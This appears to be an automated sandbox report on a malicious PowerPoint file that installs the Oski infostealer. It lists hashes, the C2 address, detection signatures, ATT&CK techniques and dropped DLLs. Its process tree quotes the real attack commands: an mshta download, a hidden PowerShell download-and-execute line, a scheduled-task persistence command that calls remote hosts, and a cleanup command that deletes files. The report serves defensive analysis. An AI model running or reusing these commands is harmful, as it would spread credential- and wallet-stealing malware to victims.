Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    31-07-2021 04:57

General

  • Target

    HR-Ageing-Report.ppt

  • Size

    82KB

  • MD5

    e2c84712e1b4ff68b9d85729dbda044a

  • SHA1

    c095064894d2ac8c0864d68d5de14324e49ce010

  • SHA256

    8a7eedce7576affb0bcb4fad28a5fdb6c5581efa956aaba80193c18b475266c4

  • SHA512

    a5af0aae421fdac20de13c008d4f5656f3efcc1d2805c75f467e097687056ea96e6e2981fe71b27dc05c0027904608b673f008ab248686a2a12c938af4ad07f3

Malware Config

Extracted

Family

oski

C2

103.99.1.60/we/king/

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Blocklisted process makes network request 20 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\HR-Ageing-Report.ppt"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1264
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe rubishdata/Rmshta https://www.bitly.com/tuiwqgdbhsavdbnasvdkasghdhkjas
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:988
        • C:\Windows\SysWOW64\mshta.exe
          mshta https://www.bitly.com/tuiwqgdbhsavdbnasvdkasghdhkjas
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1420
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://ia601409.us.archive.org/20/items/sb_20210728/king.txt') -useB);
            4⤵
            • Blocklisted process makes network request
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1176
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              5⤵
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:1556
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /pid 1556 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe & RD /S /Q C:\\ProgramData\\143229957831036\\* & exit
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1900
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /pid 1556
                  7⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:596
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://1230948%1230948@randikhanaekminar.blogspot.com/p/kingnew.html\""
            4⤵
            • Creates scheduled task(s)
            PID:676

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Collection

    Data from Local System

    1
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      MD5

      2902de11e30dcc620b184e3bb0f0c1cb

      SHA1

      5d11d14a2558801a2688dc2d6dfad39ac294f222

      SHA256

      e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

      SHA512

      efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      506c8b6db2a67f3b19e038d0fe811033

      SHA1

      fa6944a9042e5ec7d8cdcf379d545c0a25157ad2

      SHA256

      a4bc765c14f413bc24c5c2b5794bb9547b9c9e3231c65fec03e6ed2257e1dd87

      SHA512

      d9b47fd077cf23a91db54d1d69ad199556593a14c659d316d793b26cee3adb9be938ba6556dff2b8eb5635287917d786446bfe1788386cf514d3f0a866b461d5

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • \ProgramData\mozglue.dll
      MD5

      8f73c08a9660691143661bf7332c3c27

      SHA1

      37fa65dd737c50fda710fdbde89e51374d0c204a

      SHA256

      3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

      SHA512

      0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

    • \ProgramData\msvcp140.dll
      MD5

      109f0f02fd37c84bfc7508d4227d7ed5

      SHA1

      ef7420141bb15ac334d3964082361a460bfdb975

      SHA256

      334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

      SHA512

      46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

    • \ProgramData\nss3.dll
      MD5

      bfac4e3c5908856ba17d41edcd455a51

      SHA1

      8eec7e888767aa9e4cca8ff246eb2aacb9170428

      SHA256

      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

      SHA512

      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

    • \ProgramData\sqlite3.dll
      MD5

      e477a96c8f2b18d6b5c27bde49c990bf

      SHA1

      e980c9bf41330d1e5bd04556db4646a0210f7409

      SHA256

      16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

      SHA512

      335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

    • \ProgramData\vcruntime140.dll
      MD5

      7587bf9cb4147022cd5681b015183046

      SHA1

      f2106306a8f6f0da5afb7fc765cfa0757ad5a628

      SHA256

      c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

      SHA512

      0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

    • memory/596-110-0x0000000000000000-mapping.dmp
    • memory/676-71-0x0000000000000000-mapping.dmp
    • memory/988-66-0x0000000000000000-mapping.dmp
    • memory/1176-85-0x00000000056C0000-0x00000000056C1000-memory.dmp
      Filesize

      4KB

    • memory/1176-73-0x0000000004910000-0x0000000004911000-memory.dmp
      Filesize

      4KB

    • memory/1176-74-0x00000000048D0000-0x00000000048D1000-memory.dmp
      Filesize

      4KB

    • memory/1176-75-0x00000000048D2000-0x00000000048D3000-memory.dmp
      Filesize

      4KB

    • memory/1176-76-0x00000000025C0000-0x00000000025C1000-memory.dmp
      Filesize

      4KB

    • memory/1176-77-0x0000000005240000-0x0000000005241000-memory.dmp
      Filesize

      4KB

    • memory/1176-80-0x0000000006080000-0x0000000006081000-memory.dmp
      Filesize

      4KB

    • memory/1176-98-0x0000000000480000-0x0000000000483000-memory.dmp
      Filesize

      12KB

    • memory/1176-86-0x0000000006100000-0x0000000006101000-memory.dmp
      Filesize

      4KB

    • memory/1176-93-0x0000000006280000-0x0000000006281000-memory.dmp
      Filesize

      4KB

    • memory/1176-94-0x00000000062C0000-0x00000000062C1000-memory.dmp
      Filesize

      4KB

    • memory/1176-95-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

    • memory/1176-72-0x0000000000E70000-0x0000000000E71000-memory.dmp
      Filesize

      4KB

    • memory/1176-69-0x0000000000000000-mapping.dmp
    • memory/1264-65-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp
      Filesize

      8KB

    • memory/1264-63-0x0000000000000000-mapping.dmp
    • memory/1348-60-0x0000000074C11000-0x0000000074C15000-memory.dmp
      Filesize

      16KB

    • memory/1348-68-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1348-64-0x00000000762C1000-0x00000000762C3000-memory.dmp
      Filesize

      8KB

    • memory/1348-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1348-61-0x0000000071CA1000-0x0000000071CA3000-memory.dmp
      Filesize

      8KB

    • memory/1420-67-0x0000000000000000-mapping.dmp
    • memory/1556-102-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

    • memory/1556-99-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

    • memory/1556-100-0x000000000040717B-mapping.dmp
    • memory/1900-109-0x0000000000000000-mapping.dmp